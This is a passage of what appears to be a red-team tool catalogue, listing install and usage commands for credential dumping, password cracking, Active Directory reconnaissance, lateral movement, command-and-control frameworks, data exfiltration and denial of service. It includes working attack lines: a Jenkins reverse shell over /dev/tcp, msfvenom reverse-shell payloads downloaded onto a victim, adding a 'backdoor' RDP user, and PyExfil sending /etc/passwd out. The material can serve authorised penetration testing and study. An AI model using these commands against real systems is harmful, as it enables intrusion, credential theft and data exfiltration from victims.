.\laZagne.exe browsers

# Launch only a specific software script
.\laZagne.exe browsers -firefox

image

Tool for cracking password hashes. Supports a large list of hashing algorithms (Full list can be found here).

Install: Binary

You can install the standalone binary from here.

Usage:

.\hashcat.exe --help

Nice hashcat command cheatsheet.

image

Another password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs and GPUs.

Install:

sudo apt-get install john -y

Usage:

john

image

Discovery

This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.

Install:

git clone https://github.com/lgandx/PCredz

Usage: (PCAP File Folder)

python3 ./Pcredz -d /tmp/pcap-directory-to-parse/

Usage: (Live Capture)

python3 ./Pcredz -i eth0 -v

image

Ping Castle is a tool designed to assess quickly the Active Directory security level with a methodology based on risk assessment and a maturity framework. It does not aim at a perfect evaluation but rather as an efficiency compromise.

Install: (Download)

https://github.com/vletoux/pingcastle/releases/download/2.11.0.1/PingCastle_2.11.0.1.zip

Usage:

./PingCastle.exe

image

Seatbelt is a useful tool for gathering detailed information about the security posture of a target Windows machine in order to identify potential vulnerabilities and attack vectors.

It is designed to be run on a compromised victim machine to gather information about the current security configuration, including information about installed software, services, group policies, and other security-related settings

Install: (Compile)

Seatbelt has been built against .NET 3.5 and 4.0 with C# 8.0 features and is compatible with Visual Studio Community Edition.

Open up the project .sln, choose "release", and build.

Usage:

# Run all checks and output to output.txt
Seatbelt.exe -group=all -full > output.txt

# Return 4624 logon events for the last 30 days
Seatbelt.exe "LogonEvents 30"

# Query the registry three levels deep, returning only keys/valueNames/values that match the regex .*defini.*
Seatbelt.exe "reg \"HKLM\SOFTWARE\Microsoft\Windows Defender\" 3 .*defini.* true"

# Run remote-focused checks against a remote system
Seatbelt.exe -group=remote -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\""

Full command groups and parameters can be found here.

image

Image used from https://exord66.github.io/csharp-in-memory-assemblies

Great tool for gathering information about a victim's Microsoft Active Directory (AD) environment, with support for Excel outputs.

It can be run from any workstation that is connected to the environment, even hosts that are not domain members.

BlackHat USA 2018 SlideDeck

Prerequisites

  • .NET Framework 3.0 or later (Windows 7 includes 3.0)
  • PowerShell 2.0 or later (Windows 7 includes 2.0)

Install: (Git)

git clone https://github.com/sense-of-security/ADRecon.git

Install: (Download)

You can download a zip archive of the latest release.

Usage:

# To run ADRecon on a domain member host.
PS C:\> .\ADRecon.ps1

# To run ADRecon on a domain member host as a different user.
PS C:\>.\ADRecon.ps1 -DomainController <IP or FQDN> -Credential <domain\username>

# To run ADRecon on a non-member host using LDAP.
PS C:\>.\ADRecon.ps1 -Protocol LDAP -DomainController <IP or FQDN> -Credential <domain\username>

# To run ADRecon with specific modules on a non-member host with RSAT. (Default OutputType is STDOUT with -Collect parameter)
PS C:\>.\ADRecon.ps1 -Protocol ADWS -DomainController <IP or FQDN> -Credential <domain\username> -Collect Domain, DomainControllers

Full usage and parameter information can be found here.

image

Image used from https://vk9-sec.com/domain-enumeration-powerview-adrecon/

Lateral Movement

This is a great tool for pivoting in a Windows/Active Directory environment using credential pairs (username:password, username:hash). It also offered other features including enumerating logged on users and spidering SMB shares to executing psexec style attacks, auto-injecting Mimikatz/Shellcode/DLL’s into memory using Powershell, dumping the NTDS.dit and more.

Install:

sudo apt install crackmapexec

Usage:

crackmapexec smb <ip address> -d <domain> -u <user list> -p <password list>

image

WMIOps is a powershell script that uses WMI to perform a variety of actions on hosts, local or remote, within a Windows environment.

Developed by @christruncer.

Original blog post documenting release.

Install: (PowerShell)

git clone https://github.com/FortyNorthSecurity/WMIOps
Import-Module WMIOps.ps1

Usage:

# Executes a user specified command on the target machine
Invoke-ExecCommandWMI

# Returns all running processes from the target machine
Get-RunningProcessesWMI

# Checks if a user is active at the desktop on the target machine (or if away from their machine)
Find-ActiveUsersWMI

# Lists all local and network connected drives on target system
Get-SystemDrivesWMI

# Executes a powershell script in memory on the target host via WMI and returns the output
Invoke-RemoteScriptWithOutput

image

image

Images used from https://pentestlab.blog/2017/11/20/command-and-control-wmi/

Tool that uses MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe.

Install:

git clone https://github.com/Mr-Un1k0d3r/PowerLessShell
cd PowerLessShell

Usage:

# Help
python PowerLessShell.py -h

# Generate PowerShell payload 
python PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj

# Generating a shellcode payload
python PowerLessShell.py -source shellcode.raw -output malicious.csproj

Full usage information can be found here.

image

Image used from https://bank-security.medium.com/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628

PsExec is a part of the Sysinternals suite of tools, which is a collection of utilities for managing and troubleshooting Windows systems.

It is great for remotely executing commands on target machines.

Note: Some AVs detect PsExec as a 'remote admin' virus.

Install: (PowerShell)

Invoke-WebRequest -Uri 'https://download.sysinternals.com/files/PSTools.zip' -OutFile 'pstools.zip'
Expand-Archive -Path 'pstools.zip' -DestinationPath "$env:TEMP\pstools"
Move-Item -Path "$env:TEMP\pstools\psexec.exe" .
Remove-Item -Path "$env:TEMP\pstools" -Recurse

Usage:

# Prevent the license agreement from being displayed
psexec.exe /accepteula

# Run the 'hostname' command on remote machine
psexec.exe \\REMOTECOMPUTER hostname

# Run the 'hostname' command on EVERYTHING (on the domain)
psexec.exe \\* hostname

# Run a local executable on a remote machine
psexec.exe \\REMOTECOMPUTER -c C:\Tools\program.exe

# Run the 'hostname' command with different credentials
psexec.exe \\REMOTECOMPUTER hostname -u localadmin -p secret-p@$$word

# Spawn shell on remote machine
psexec.exe -s \\REMOTECOMPUTER cmd

Great blog post on PsExec usage.

image

Image used from https://adamtheautomator.com/psexec/

🔙Enabling RDP

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
net localgroup "Remote Desktop Users" "backdoor" /add

🔙Upgrading shell to meterpreter

Shells (https://infinitelogins.com/tag/payloads/)

After getting basic shell access to an endpoint a meterpreter is nicer to continue with.

[attacker] Generate a meterpreter shell:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf

image

[victim] Download to victim endpoint:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"`

[attacker] Configure listener:

use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST your-ip 
set LPORT listening-port run`

[victim] Execute payload:

Start-Process "shell-name.exe"`

image

🔙Forwarding Ports

Sometimes, after gaining access to an endpoint there are local ports. Making these internal ports external routable can help for lateral movement to other services on the host.

socat TCP-LISTEN:8888,fork TCP:127.0.0.1:80 &
socat TCP-LISTEN:EXTERNAL_PORT,fork TCP:127.0.0.1:INTERNAL_PORT &

🔙Jenkins reverse shell

If you gain access to a jenkins script console you can use this to gain a reverse shell on the node.

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP_ADDRESS/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Collection

An application used to visualize active directory environments. A quick way to visualise attack paths and understand victims' active directory properties.

Install: PenTestPartners Walkthrough

Custom Queries: CompassSecurity BloodHoundQueries

image

Snaffler is an advanced credential scanner/collector for Active Directory environments. With a great README.

Snaffler uses a system of "classifiers", each of which examine shares or folders or files or file contents, passing some items downstream to the next classifier, and discarding others. Each classifier uses a set of rules to decide what to do with the items it classifies.

More information about Snaffler rules.

'Broadly speaking - it gets a list of Windows computers from Active Directory, then spreads out its snaffly appendages to them all to figure out which ones have file shares, and whether you can read them.' - Snaffler README (2023)

Install:

You can download the binary from the GitHub Releases Page.

Usage:

# Targeted local scan (less likely to trigger detections)
Snaffler.exe -s -i C:\

# Go in loud and find everything
snaffler.exe -s -o snaffler.log

image

Image used from https://github.com/SnaffCon/Snaffler#what-does-it-look-like

Command and Control

Havoc is a modern and malleable post-exploitation command and control framework, created by @C5pider.

Features include: Sleep Obfuscation, x64 return address spoofing, Indirect Syscalls for Nt* APIs

Pre-requisites: (Ubuntu 20.04 / 22.04)

sudo apt install build-essential
sudo add-apt-repository ppa:deadsnakes/ppa
sudo apt update
sudo apt install python3.10 python3.10-dev

Build + Usage:

git clone https://github.com/HavocFramework/Havoc.git
cd Havoc/Client
make 
./Havoc 

Pre-requisites: (Ubuntu 20.04 / 22.04)

cd Havoc/Teamserver
go mod download golang.org/x/sys  
go mod download github.com/ugorji/go

Build + Usage:

cd Teamserver
./Install.sh
make
./teamserver -h

Run the teamserver

sudo ./teamserver server --profile ./profiles/havoc.yaotl -v --debug

Full install, build and run instructions on the wiki

image

Covenant is a .NET command and control framework, it has a web interface that allows for multi-user collaboration.

It can be used to remotely control compromised systems and perform a variety of different tasks, including executing arbitrary code, capturing keystrokes, exfiltrating data, and more.

Install: (Dotnet Core)

You can download dotnet core for your platform from here.

Note: After starting Covenant, you must register an initial user through the web interface. Navigating to the web interface will allow you to register the initial user

git clone --recurse-submodules https://github.com/cobbr/Covenant
cd Covenant/Covenant

Usage: (Dotnet Core)

~/Covenant/Covenant > dotnet run
warn: Microsoft.EntityFrameworkCore.Model.Validation[10400]
      Sensitive data logging is enabled. Log entries and exception messages may include sensitive application data, this mode should only be enabled during development.
WARNING: Running Covenant non-elevated. You may not have permission to start Listeners on low-numbered ports. Consider running Covenant elevated.
Covenant has started! Navigate to https://127.0.0.1:7443 in a browser

Install: (Docker)

# Build the docker image:
git clone --recurse-submodules https://github.com/cobbr/Covenant
cd Covenant/Covenant
~/Covenant/Covenant > docker build -t covenant .

Usage: (Docker)

# Run Covenant within the Docker container
~/Covenant/Covenant > docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v </absolute/path/to/Covenant/Covenant/Data>:/app/Data covenant

# Stop the container
~/Covenant/Covenant > docker stop covenant

# Restart Covenant interactively
~/Covenant/Covenant > docker start covenant -ai

Full installation and startup instructions can be found on the wiki here.

image

Image from https://github.com/cobbr/Covenant

Merlin is an open-source post-exploitation framework that is designed to be used after a initial compromise of a system.

It is written in Python and can be used to perform a variety of different tasks, such as executing arbitrary code, moving laterally through a network, and exfiltrating data.

Install:

  1. Download the latest compiled version of Merlin Server from the releases section
  2. Extract the files with 7zip using the x function The password is: merlin
  3. Start Merlin
  4. Configure a listener
  5. Deploy an agent. See Agent Execution Quick Start Guide for examples
mkdir /opt/merlin;cd /opt/merlin
wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z
7z x merlinServer-Linux-x64.7z
sudo ./merlinServer-Linux-x64

Usage:

  1. Ensure the Merlin server is running with a configured listener
  2. Download and deploy an agent to the victim
  3. Execute agent

For detailed usage information see the official Merlin wiki.

image

Image from https://www.foregenix.com/blog/a-first-look-at-todays-command-and-control-frameworks

Metasploit is an open-source framework for developing, testing, and using exploit code.

The Metasploit framework includes a large number of pre-built exploits and payloads, as well as a fully-featured integrated development environment (IDE) for creating and testing custom exploits.

Install: (Installer)

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall

Usage:

/opt/metasploit-framework/bin/msfconsole

Full installation instructions can be found on the official wiki.

Rapid7 Metasploit blogs

Cheat sheet graphic

Nice command list

image

Image used from https://goacademy.io/how-to-install-metasploit-on-kali-linux/

Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) C2 and post-exploitation framework written in python and C.

It allows an attacker to remotely control a victim's computer and execute various actions, such as command execution, key logging, and taking screen shots.

Install: (Git)

sudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv
git clone --recursive https://github.com/n1nj4sec/pupy
cd pupy
python create-workspace.py -DG pupyw

Roll fix to fix the error:

sudo pip2 install rpyc==3.4.4

Start:

export PATH=$PATH:~/.local/bin; pupysh
pupyws/bin/pupysh

Git install instructions used from here.

Install: (Docker)

For detailed docker and pupy installation instructions see the wiki.

Usage:

# Get help page for any builtin commands with -h
>> sessions -h
>> jobs -h
>> run -h

# Interact with session 1
>> sessions -i 1

# Run local command 'ls'
>> !ls

Full usage information can be found on the wiki.

The wiki contains good post exploitation information.

image

Image used from https://github.com/n1nj4sec/pupy/wiki/Screenshots

BruteRatel is a great command and control (C4) framework created by @NinjaParanoid. The framework consists of a client component 'badger' that is installed on the compromised system, and a server component 'commander' that is run by the red team.

The client and server communicate with each other using various communication channels, such as HTTP, DNS, or TCP, and can be configured to use different encoding and encryption methods to evade detection.

Some nice features:

  • DNS Over HTTPS
  • Indirect Syscalls
  • Built-in Debugger To Detect EDR Userland Hooks
  • MITRE graph intergration
  • Adversary TTP automation

Install:

To legally get access to the framework you will need to buy a licence (1 Year $2500 per user). See the pricing page for more information.

After purchase you can download the framework from here with your Activation Key and License User ID.

Usage:

# Loads a powershell script to memory which can be Invoked using psreflect
psimport

# Locks keyboard and mouse hardware input. Use ‘unlock_input’ command to unlock
lock_input

# Dumps user clipboard
dumpclip

# Enumerates basic domain information
dcenum

# Elevates user privileges to SYSTEM (Requires admin rights)
get_system

# Takes a screenshot of current desktop and stores it on the server
screenshot

# Dumps LSASS to C:\Windows\Memory.DMP using the PssCaptureSnapshot technique
shadowclone

Full commander terminal usage information can be found here.

image

Image used from https://bruteratel.com/

Exfiltration

A tool for establishing C2 connections via DNS, even if the attacker and victim machines are behind a firewall / network address translation (NAT).

The tool is designed to be stealthy and difficult to detect, as it uses legitimate DNS traffic to transmit data.

Install: (Compile - Server)

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
gem install bundler
bundle install

Install: (Compile - Client)

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make

Full installation information can be found in the Installation Section.

Usage: (Server)

# Establish the server
ruby ./dnscat2.rb DOMAIN.COM

Usage: (Client)

# Establish the client with authoritative domain
./dnscat2 DOMAIN.COM

# Establish the client without authoritative domain
./dnscat2 --dns host=0.0.0.0,port=0000

# Ping the server from the client
./dnscat --ping DOMAIN.COM

# Ping the server from the client, with custom dns resolver ip
./dnscat --dns server=0.0.0.0,domain=DOMAIN.COM --ping

Usage: (Tunnels)

# (After establishing the client) You can open a new tunnelled port
listen [lhost:]lport rhost:rport

# Forward ssh connections through the dnscat2 client to an internal device
listen 127.0.0.1:2222 10.10.10.10:22

Full usage information can be found in the Usage Section.

image

When exfiltrating victim files, DLP (Data Loss Prevention) solutions will typically trigger on strings within these files. Cloakify reduces this risk by transforming the data.

Cloakify transforms any filetype (e.g. .zip, .exe, .xls, etc.) into a list of harmless-looking strings. This lets you hide the file in plain sight, and transfer the file without triggering alerts.

Note: You can make your own ciphers, see here for more info.

Install:

git clone https://github.com/TryCatchHCF/Cloakify

Usage:

# Cloakify some text
python3 cloakify.py TEXT.txt ciphers/desserts.ciph > TEXT.cloaked

# De-Cloakify the text
python3 decloakify.py TEXT.cloaked ciphers/desserts.ciph

image

image

"An Alpha-Alpha stage package, not yet tested (and will appreciate any feedbacks and commits) designed to show several techniques of data exfiltration is real-world scenarios."

Install:

git clone https://www.github.com/ytisf/PyExfil;cd PyExfil;pip install -r requirements.txt;pip install py2exe;pip setup.py install

Usage: (Full Usage here)

HTTP Cookies

from pyexfil.network.HTTP_Cookies.http_exfiltration import send_file, listen

# For Client (exfil)
send_file(addr='http://www.morirt.com', file_path=FILE_TO_EXFIL)

# For Server (collecting)
listen(local_addr='127.0.0.1', local_port=80)

ICMP Echo 8

from pyexfil.network.ICMP.icmp_exfiltration import send_file, init_listener

# For Client (exfil)
ip_addr = "127.0.0.1"
send_file(ip_addr, src_ip_addr="127.0.0.1", file_path="", max_packetsize=512, SLEEP=0.1)

# For Server (collecting)
init_listener(ip_addr, saving_location="/tmp/")

NTP Request

from pyexfil.network.NTP.ntp_exfil import exfiltrate, ntp_listen, NTP_UDP_PORT

# For Client (exfil)
ip_addr = "127.0.0.1"
exfiltrate("/etc/passwd", ip_addr, time_delay=0.1)

# For Server (collecting)
ntp_listener(ip="0.0.0.0", port=NTP_UDP_PORT)

image

Python based backdoor that uses Gmail to exfiltrate data as an e-mail attachment. It tracks the user activity using screen capture and sends the information to an attacker as an e-mail attachment.

Install:

git clone https://github.com/Viralmaniar/Powershell-RAT

Usage: (Full Usage here)

Setup

  • Throwaway Gmail address
  • Enable "Allow less secure apps" by going to https://myaccount.google.com/lesssecureapps
  • Modify the $username & $password variables for your account in the Mail.ps1 Powershell file
  • Modify $msg.From & $msg.To.Add with throwaway gmail address

image

Tool for exfiltrating files from a target's Google Drive that you have access to, via Google's API.

This includes all shared files, all files from shared drives, and all files from domain drives that the target has access to.

Install:

git clone https://github.com/antman1p/GD-Thief.git
cd GD-Thief
pip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib

then...

  1. Create a new Google Cloud Platform (GCP) project
  2. Enable a Google Workspace API
  3. Configure OAuth Consent screen
  4. Create a credential
  5. Add the victim's Google account to the Application's Test Users

For detailed setup instructions see the How To Guide.

Usage:

usage:
python3 gd_thief.py [-h] -m [{dlAll, dlDict[-d <DICTIONARY FILE PATH>]}
	[-t <THREAD COUNT>]

help:

This Module will connect to Google's API using an access token and exfiltrate files
from a target's Google Drive.  It will output exfiltrated files to the ./loot directory

arguments:
        -m [{dlAll, dlDict}],
                --mode [{dlAll, dlDict}]
                The mode of file download
                Can be "dlAll", "dlDict [-d <DICTIONARY FILE PATH>]", or... (More options to come)

optional arguments:
        -d <DICTIONARY FILE PATH>, --dict <DICTIONARY FILE PATH>
                        Path to the dictionary file. Mandatory with download mode"-m, --mode dlDict"
                        You can use the provided dictionary, per example: "-d ./dictionaries/secrets-keywords.txt"
        -t <THREAD COUNT>, --threads <THREAD COUNT>
                        Number of threads. (Too many could exceeed Google's rate limit threshold)

        -h, --help
                show this help message and exit

Nice blog post explaining the logic behind the tool.

Impact

Slowloris is a type of denial-of-service (DoS) attack that involves sending HTTP requests to a web server in a way that ties up the server's resources, preventing it from being able to process legitimate requests.

This attack would typically be conducted with a botnet, it is designed to be difficult to detect and mitigate, as it uses a relatively small number of connections and does not generate a large amount of traffic.

Install: (Pip)

sudo pip3 install slowloris

Install: (Git)

git clone https://github.com/gkbrk/slowloris.git
cd slowloris

Usage:

# Pip
slowloris example.com

# Git
python3 slowloris.py example.com

image